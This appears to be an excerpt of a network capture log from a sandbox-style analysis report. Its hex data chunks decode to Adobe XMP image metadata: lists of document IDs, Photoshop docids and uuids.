45 30 46 34 37 32 39 46 33 43 36 34 34 43 41 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 42 38 31
                                                                                                                                                                                    Data Ascii: >BB70AE0B5C1C61A1E047ECB5CF6CDCAF</rdf:li> <rdf:li>BB7571A8AFF59E8FF3D0FC755E77DDD6</rdf:li> <rdf:li>BB770751999B16805D642BDE7F6AF376</rdf:li> <rdf:li>BB7C861CEDBC5EFB1EDE1A6713D914E4</rdf:li> <rdf:li>BB818FC1FDB0CBCFE0F4729F3C644CA6</rdf:li> <rdf:li>BB81
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7677INData Raw: 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 39 33 38 39 45 33 35 33 32 41 42 34 36 33 30 37 46 38 31 43 45 34 32 32 45 31 39 38 30 46 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 39 33 42 34 33 41 36 43 38 37 45 31 39 32 37 34 41 43 34 31 45 34 34 30 42 34 30 41 39 44 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 39 34 36 32 31 45 33 31 43 35 43 33 43 32 32 35 31 39 35 39 37 44 34 46 41 34 42 42 39 34 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 39 34 36 35 31 46 36 39 38 34 33 33 35 44 36 41 35 46 39 30 45 35 39 41 46 31 36 39 45 37 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 39 34 43 34 32 33 44 42 36 41 37 43 33 42 44 32 41 46 39 45 41 32 36 35 34 32 38 39 34 30 41 3c 2f 72 64 66 3a
                                                                                                                                                                                    Data Ascii: /rdf:li> <rdf:li>C9389E3532AB46307F81CE422E1980F9</rdf:li> <rdf:li>C93B43A6C87E19274AC41E440B40A9DE</rdf:li> <rdf:li>C94621E31C5C3C22519597D4FA4BB94A</rdf:li> <rdf:li>C94651F6984335D6A5F90E59AF169E7E</rdf:li> <rdf:li>C94C423DB6A7C3BD2AF9EA265428940A</rdf:
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7693INData Raw: 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 35 46 46 38 35 30 38 37 36 43 36 36 30 45 37 30 46 46 39 44 35 36 42 33 35 41 30 43 46 43 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 35 46 46 38 42 34 41 45 42 45 45 38 44 42 32 32 31 39 42 46 33 38 35 46 45 46 43 34 45 39 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 36 31 32 38 30 39 44 42 36 43 43 34 32 45 34 41 43 42 31 37 30 45 46 30 39 34 30 38 43 32 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 36 32 37 38 36 37 41 33 34 38 35 45 31 46 42 44 31 43 46 38 39 44 38 32 42 31 30 35 38 42 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 36 33 39 37 31 45 34 35 32 45 35 33 31 38 46 43 41 42 34 31 36 44 35 30 30 30 32 37 43 42 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c
                                                                                                                                                                                    Data Ascii: li> <rdf:li>D5FF850876C660E70FF9D56B35A0CFCD</rdf:li> <rdf:li>D5FF8B4AEBEE8DB2219BF385FEFC4E9D</rdf:li> <rdf:li>D612809DB6CC42E4ACB170EF09408C24</rdf:li> <rdf:li>D627867A3485E1FBD1CF89D82B1058B2</rdf:li> <rdf:li>D63971E452E5318FCAB416D500027CB7</rdf:li> <
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7699INData Raw: 43 34 43 33 33 43 44 37 42 36 33 45 35 31 41 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 42 38 41 42 43 31 31 42 30 44 38 32 33 34 34 37 34 33 37 31 39 30 46 41 41 38 42 41 43 36 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 42 39 30 39 33 33 39 35 33 39 39 45 42 38 38 37 39 33 39 35 45 31 32 41 31 45 37 32 35 31 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 42 39 37 39 39 37 37 42 45 45 32 46 30 31 41 38 41 33 39 35 37 32 39 43 41 35 30 43 33 43 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 42 41 41 31 37 31 37 46 34 37 41 39 41 31 34 43 33 44 42 39 39 36 34 39 30 43 38 44 43 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 42 41 45 32 34 32 39 33 34 44 42 34 30 30 38 37 46 38 30 46
                                                                                                                                                                                    Data Ascii: C4C33CD7B63E51A8</rdf:li> <rdf:li>DB8ABC11B0D823447437190FAA8BAC67</rdf:li> <rdf:li>DB9093395399EB8879395E12A1E7251E</rdf:li> <rdf:li>DB979977BEE2F01A8A395729CA50C3C7</rdf:li> <rdf:li>DBAA1717F47A9A14C3DB996490C8DC42</rdf:li> <rdf:li>DBAE242934DB40087F80F
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7715INData Raw: 45 38 41 36 35 31 43 46 39 39 45 34 36 41 43 33 42 30 30 30 44 46 43 30 36 45 30 36 31 32 32 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 38 41 38 41 36 39 42 35 45 42 36 37 39 31 33 43 30 35 31 34 45 42 43 32 33 39 37 36 45 42 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 38 42 36 31 37 33 45 31 37 41 30 46 37 42 46 34 32 35 45 38 38 34 36 36 39 33 37 39 44 42 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 38 42 46 32 30 44 41 42 31 46 43 34 45 39 39 42 35 34 44 34 44 38 42 32 30 39 33 31 42 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 38 43 36 30 44 33 38 36 43 44 35 44 43 36 45 43 43 39 44 38 35 34 44 41 36 31 34 31 37 30 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 38 44 32 43
                                                                                                                                                                                    Data Ascii: E8A651CF99E46AC3B000DFC06E06122F</rdf:li> <rdf:li>E8A8A69B5EB67913C0514EBC23976EB4</rdf:li> <rdf:li>E8B6173E17A0F7BF425E884669379DBA</rdf:li> <rdf:li>E8BF20DAB1FC4E99B54D4D8B20931B31</rdf:li> <rdf:li>E8C60D386CD5DC6ECC9D854DA6141703</rdf:li> <rdf:li>E8D2C
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7731INData Raw: 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 30 42 32 39 42 37 36 44 34 33 34 42 32 45 32 44 45 45 30 35 30 33 31 30 44 37 41 38 38 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 31 42 42 45 37 44 43 30 38 43 31 41 41 46 35 33 42 34 34 36 34 31 39 31 42 39 44 35 42 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 33 37 33 36 33 33 36 38 46 36 41 39 32 44 42 36 42 42 43 31 38 39 35 39 38 44 37 37 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 34 35 42 45 33 34 44 42 39 38 34 45 33 32 42 30 32 39 45 42 34 43 31 42 46 36 44 36 33 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 34 41 45 35 45 31 36 45 38 46 46 46 33 46 39 39 41 32 45 39 44 46 30 43 38 37 35 46 38 46 3c 2f 72 64 66 3a 6c
                                                                                                                                                                                    Data Ascii: rdf:li> <rdf:li>F40B29B76D434B2E2DEE050310D7A88B</rdf:li> <rdf:li>F41BBE7DC08C1AAF53B4464191B9D5B7</rdf:li> <rdf:li>F437363368F6A92DB6BBC189598D7731</rdf:li> <rdf:li>F445BE34DB984E32B029EB4C1BF6D630</rdf:li> <rdf:li>F44AE5E16E8FFF3F99A2E9DF0C875F8F</rdf:l
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7739INData Raw: 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 41 39 41 38 42 38 34 41 43 31 45 38 45 43 31 43 42 37 32 31 36 36 32 37 39 42 34 31 43 41 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 41 41 31 31 35 33 37 46 44 38 33 41 30 46 33 35 33 43 30 30 46 46 35 38 38 32 30 34 34 46 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 41 41 32 34 44 30 45 31 34 44 38 32 32 34 46 46 31 31 31 30 43 30 35 38 38 42 43 45 35 43 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 41 41 37 39 42 30 34 34 34 43 31 36 33 36 30 38 32 42 34 39 35 44 44 39 37 45 39 38 37 46 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 41 41 45 31 42 35 35 37 37 41 35 36 37 39 45 30 41 31 36 37 31 41 30 33 46 34 45 45 45 32 32 3c 2f 72 64 66 3a 6c 69 3e
                                                                                                                                                                                    Data Ascii: f:li> <rdf:li>FA9A8B84AC1E8EC1CB72166279B41CAF</rdf:li> <rdf:li>FAA11537FD83A0F353C00FF5882044F1</rdf:li> <rdf:li>FAA24D0E14D8224FF1110C0588BCE5C4</rdf:li> <rdf:li>FAA79B0444C1636082B495DD97E987FC</rdf:li> <rdf:li>FAAE1B5577A5679E0A1671A03F4EEE22</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7755INData Raw: 31 31 37 38 2d 61 32 33 34 2d 39 30 32 33 31 38 37 34 63 31 63 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 30 35 39 37 31 31 63 2d 36 31 33 34 2d 31 31 37 39 2d 61 33 62 63 2d 66 36 62 62 38 38 34 33 36 37 39 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 30 39 31 38 32 33 33 2d 63 62 31 32 2d 31 31 65 37 2d 39 36 66 65 2d 39 39 66 30 31 63 31 62 32 32 65 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 30 63 32 32 66 34 31 2d 33 30 33 62 2d 31 31 65 38 2d 39 61 34 31 2d 38 35 64 35 35 36 64 38 37 63 66 30 3c 2f 72 64 66
                                                                                                                                                                                    Data Ascii: 1178-a234-90231874c1c0</rdf:li> <rdf:li>adobe:docid:photoshop:2059711c-6134-1179-a3bc-f6bb8843679d</rdf:li> <rdf:li>adobe:docid:photoshop:20918233-cb12-11e7-96fe-99f01c1b22e5</rdf:li> <rdf:li>adobe:docid:photoshop:20c22f41-303b-11e8-9a41-85d556d87cf0</rdf
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7771INData Raw: 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 34 66 39 30 66 65 33 32 2d 36 39 30 39 2d 31 31 37 39 2d 61 34 33 31 2d 61 31 34 35 30 32 31 64 35 36 34 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 35 30 31 33 65 36 63 31 2d 33 36 38 30 2d 31 31 65 35 2d 38 39 65 31 2d 64 33 61 61 34 63 65 30 61 31 36 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 35 30 34 63 61 62 63 33 2d 61 65 63 39 2d 31 31 64 39 2d 38 62 35 37 2d 38 63 61 61 35 33 61 38 34 31 63 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 35 30 36 36 30 30 63 38 2d
                                                                                                                                                                                    Data Ascii: e:docid:photoshop:4f90fe32-6909-1179-a431-a145021d564f</rdf:li> <rdf:li>adobe:docid:photoshop:5013e6c1-3680-11e5-89e1-d3aa4ce0a16b</rdf:li> <rdf:li>adobe:docid:photoshop:504cabc3-aec9-11d9-8b57-8caa53a841c7</rdf:li> <rdf:li>adobe:docid:photoshop:506600c8-
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7779INData Raw: 62 37 30 39 66 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 39 30 35 35 35 30 37 2d 39 63 33 62 2d 31 31 37 37 2d 62 36 66 37 2d 39 36 32 61 33 62 63 32 34 39 35 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 39 62 65 37 65 32 38 2d 38 31 34 37 2d 31 31 65 37 2d 39 39 34 32 2d 63 33 35 65 62 62 63 39 66 32 38 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 39 65 32 64 34 62 34 2d 30 34 33 37 2d 31 31 37 39 2d 38 66 36 66 2d 64 61 36 35 38 39 39 32 63 35 39 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f
                                                                                                                                                                                    Data Ascii: b709f5</rdf:li> <rdf:li>adobe:docid:photoshop:69055507-9c3b-1177-b6f7-962a3bc2495f</rdf:li> <rdf:li>adobe:docid:photoshop:69be7e28-8147-11e7-9942-c35ebbc9f282</rdf:li> <rdf:li>adobe:docid:photoshop:69e2d4b4-0437-1179-8f6f-da658992c59f</rdf:li> <rdf:li>ado
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7795INData Raw: 70 3a 39 38 63 30 33 62 39 39 2d 62 33 39 66 2d 31 31 37 61 2d 39 31 65 66 2d 61 39 65 64 36 30 30 61 30 34 37 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 39 38 66 39 61 31 34 38 2d 31 39 62 35 2d 31 31 64 61 2d 39 63 38 65 2d 61 37 66 36 63 63 61 37 30 36 36 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 39 39 33 64 62 63 37 35 2d 39 32 65 38 2d 31 31 37 38 2d 62 64 30 37 2d 61 63 33 61 61 34 30 38 33 34 35 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 39 39 38 33 33 64 34 35 2d 61 37 64 38 2d 31 31 65 36 2d 62 37 35 34 2d 65
                                                                                                                                                                                    Data Ascii: p:98c03b99-b39f-117a-91ef-a9ed600a0473</rdf:li> <rdf:li>adobe:docid:photoshop:98f9a148-19b5-11da-9c8e-a7f6cca7066f</rdf:li> <rdf:li>adobe:docid:photoshop:993dbc75-92e8-1178-bd07-ac3aa4083456</rdf:li> <rdf:li>adobe:docid:photoshop:99833d45-a7d8-11e6-b754-e
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7811INData Raw: 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 63 65 30 31 37 61 32 63 2d 36 66 36 64 2d 31 31 64 62 2d 39 62 66 30 2d 63 64 65 32 63 61 65 36 65 37 63 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 63 65 31 39 37 63 38 34 2d 65 65 39 63 2d 31 31 64 37 2d 39 37 61 34 2d 39 31 63 37 35 36 33 64 36 66 39 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 63 65 62 30 39 30 32 31 2d 64 30 61 34 2d 31 31 64 36 2d 39 61 30 66 2d 65 39 61 61 63 35 37 61 35 65 30 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a
                                                                                                                                                                                    Data Ascii: df:li> <rdf:li>adobe:docid:photoshop:ce017a2c-6f6d-11db-9bf0-cde2cae6e7cb</rdf:li> <rdf:li>adobe:docid:photoshop:ce197c84-ee9c-11d7-97a4-91c7563d6f94</rdf:li> <rdf:li>adobe:docid:photoshop:ceb09021-d0a4-11d6-9a0f-e9aac57a5e03</rdf:li> <rdf:li>adobe:docid:
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7818INData Raw: 31 63 2d 31 31 64 39 2d 38 31 39 61 2d 39 31 35 66 34 37 62 63 61 35 64 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 65 38 37 64 65 30 35 30 2d 32 36 36 35 2d 31 31 37 38 2d 61 37 33 36 2d 39 66 35 31 37 33 63 37 32 36 32 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 65 38 63 66 31 39 30 35 2d 64 32 64 65 2d 31 31 65 37 2d 39 61 65 65 2d 38 61 30 38 33 36 38 66 34 36 38 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 65 38 64 37 30 64 65 35 2d 61 65 63 38 2d 31 31 64 39 2d 38 62 35 37 2d 38 63 61 61 35 33 61 38 34 31 63 37 3c 2f
                                                                                                                                                                                    Data Ascii: 1c-11d9-819a-915f47bca5de</rdf:li> <rdf:li>adobe:docid:photoshop:e87de050-2665-1178-a736-9f5173c7262d</rdf:li> <rdf:li>adobe:docid:photoshop:e8cf1905-d2de-11e7-9aee-8a08368f468c</rdf:li> <rdf:li>adobe:docid:photoshop:e8d70de5-aec8-11d9-8b57-8caa53a841c7</
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7834INData Raw: 43 43 34 35 41 39 38 33 45 38 46 44 44 31 31 38 33 37 35 44 42 38 46 44 36 45 37 31 41 36 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 31 43 46 33 32 31 38 30 38 38 43 43 44 46 31 31 38 32 30 45 38 34 46 31 46 38 39 44 31 42 43 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 31 44 31 46 31 34 33 43 35 33 31 44 45 30 31 31 41 41 38 44 42 45 42 44 42 36 46 38 38 30 35 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 31 44 36 42 41 31 37 37 43 43 37 45 44 45 31 31 42 42 37 42 43 39 35 42 44 37 38 35 46 34 43 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 31 44 37 34 45 39 44 45 31 44 36 31 45 30 31 31 42 36 30 36 46 45 42 31 41 43 31 45 34 41 30 34 3c 2f 72 64
                                                                                                                                                                                    Data Ascii: CC45A983E8FDD118375DB8FD6E71A63</rdf:li> <rdf:li>uuid:1CF3218088CCDF11820E84F1F89D1BC6</rdf:li> <rdf:li>uuid:1D1F143C531DE011AA8DBEBDB6F88052</rdf:li> <rdf:li>uuid:1D6BA177CC7EDE11BB7BC95BD785F4C9</rdf:li> <rdf:li>uuid:1D74E9DE1D61E011B606FEB1AC1E4A04</rd
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7850INData Raw: 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 33 45 34 45 35 30 33 35 36 43 45 44 42 31 31 41 43 45 44 43 46 45 45 44 39 35 44 42 44 34 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 33 46 32 31 46 39 41 31 38 35 38 45 30 31 31 41 36 30 41 41 30 31 37 36 36 34 35 46 39 45 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 33 46 33 42 39 42 44 42 39 30 37 45 31 31 31 38 45 43 44 46 43 39 31 35 30 45 43 36 41 32 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 34 34 41 32 38 46 46 34 35 43 43 45 31 31 31 42 41 36 44 45 33 38 34 34 31 41 42 35 38 35 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 34 36 38 36 36 43 30 30 30 36 30 31 31
                                                                                                                                                                                    Data Ascii: rdf:li> <rdf:li>uuid:53E4E50356CEDB11ACEDCFEED95DBD40</rdf:li> <rdf:li>uuid:53F21F9A1858E011A60AA0176645F9EE</rdf:li> <rdf:li>uuid:53F3B9BDB907E1118ECDFC9150EC6A29</rdf:li> <rdf:li>uuid:544A28FF45CCE111BA6DE38441AB5852</rdf:li> <rdf:li>uuid:546866C0006011
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7858INData Raw: 36 33 44 43 32 45 45 30 31 31 41 32 41 45 46 30 37 39 34 35 43 39 32 35 35 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 36 43 32 32 44 44 36 35 46 31 33 42 45 31 31 31 42 32 37 32 45 46 35 37 41 34 35 44 44 37 34 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 36 43 32 42 37 33 34 46 33 32 35 32 44 43 31 31 41 34 34 43 43 42 45 37 34 33 33 33 34 36 42 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 36 43 33 42 36 39 32 44 45 36 43 42 45 30 31 31 38 46 35 44 43 36 43 45 44 35 45 34 46 30 46 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 36 43 38 31 45 35 33 42 46 37 38 42 44 44 31 31 39 35 30 37 46 44 43 38 43 42 33 41 45 34 38 31 3c 2f 72 64 66 3a 6c 69 3e
                                                                                                                                                                                    Data Ascii: 63DC2EE011A2AEF07945C92559</rdf:li> <rdf:li>uuid:6C22DD65F13BE111B272EF57A45DD746</rdf:li> <rdf:li>uuid:6C2B734F3252DC11A44CCBE7433346B6</rdf:li> <rdf:li>uuid:6C3B692DE6CBE0118F5DC6CED5E4F0FB</rdf:li> <rdf:li>uuid:6C81E53BF78BDD119507FDC8CB3AE481</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7874INData Raw: 38 44 31 31 45 31 42 31 45 38 39 45 31 46 30 42 30 38 42 44 37 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 39 43 39 31 31 42 38 37 35 36 35 38 31 31 44 43 39 38 33 38 38 33 42 31 31 43 39 31 37 43 41 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 39 43 45 34 41 34 46 36 35 46 41 45 44 43 31 31 39 46 45 36 41 38 37 31 44 31 39 41 31 45 34 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 39 43 46 44 30 46 30 31 45 41 34 30 45 32 31 31 41 30 39 38 38 31 42 44 44 46 46 42 43 46 43 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 39 44 30 35 46 33 42 46 46 30 35 45 31 31 44 43 39 38 45 37 45 32 37 41 44 31 30 44 38 30 42 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64
                                                                                                                                                                                    Data Ascii: 8D11E1B1E89E1F0B08BD72</rdf:li> <rdf:li>uuid:9C911B87565811DC983883B11C917CA3</rdf:li> <rdf:li>uuid:9CE4A4F65FAEDC119FE6A871D19A1E4D</rdf:li> <rdf:li>uuid:9CFD0F01EA40E211A09881BDDFFBCFCC</rdf:li> <rdf:li>uuid:9D05F3BFF05E11DC98E7E27AD10D80BA</rdf:li> <rd
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7890INData Raw: 42 43 33 35 31 45 36 39 45 38 44 44 31 31 42 43 44 34 43 31 44 36 45 42 45 42 31 30 30 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 41 32 30 43 44 43 39 32 33 33 31 45 30 31 31 39 37 36 38 44 45 32 46 35 32 31 31 32 46 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 41 36 33 34 45 38 44 37 34 43 42 45 30 31 31 42 33 46 45 44 32 34 38 33 31 38 34 38 46 35 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 41 43 33 31 44 32 46 44 43 46 45 44 46 31 31 39 32 39 43 46 31 38 37 36 43 45 31 38 35 30 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 41 43 42 34 32 41 43 30 44 35 37 44 46 31 31 39 45 36 31 38 33 41 39 32 31 42 36 30 46 36 44 3c 2f 72 64 66
                                                                                                                                                                                    Data Ascii: BC351E69E8DD11BCD4C1D6EBEB1005</rdf:li> <rdf:li>uuid:DA20CDC92331E0119768DE2F52112F6B</rdf:li> <rdf:li>uuid:DA634E8D74CBE011B3FED24831848F59</rdf:li> <rdf:li>uuid:DAC31D2FDCFEDF11929CF1876CE18508</rdf:li> <rdf:li>uuid:DACB42AC0D57DF119E6183A921B60F6D</rdf
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7898INData Raw: 36 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 46 36 37 33 39 46 35 38 44 41 34 33 31 31 45 30 41 34 37 31 39 35 30 39 37 45 33 44 31 37 37 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 46 36 44 32 42 37 36 46 43 46 42 37 45 34 31 31 38 38 33 39 42 42 45 35 46 30 39 36 33 32 37 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 46 36 45 31 42 35 33 34 31 43 42 35 44 43 31 31 38 30 37 38 45 43 44 41 35 41 30 39 42 38 33 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 46 36 46 30 39 41 34 30 34 45 32 32 44 46 31 31 42 39 35 38 46 37 45 32 41 46 32 41 45 41 34 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 46 37 30 39 32 46 44 45 35 36
                                                                                                                                                                                    Data Ascii: 6A</rdf:li> <rdf:li>uuid:F6739F58DA4311E0A47195097E3D1770</rdf:li> <rdf:li>uuid:F6D2B76FCFB7E4118839BBE5F0963273</rdf:li> <rdf:li>uuid:F6E1B5341CB5DC118078ECDA5A09B837</rdf:li> <rdf:li>uuid:F6F09A404E22DF11B958F7E2AF2AEA4A</rdf:li> <rdf:li>uuid:F7092FDE56
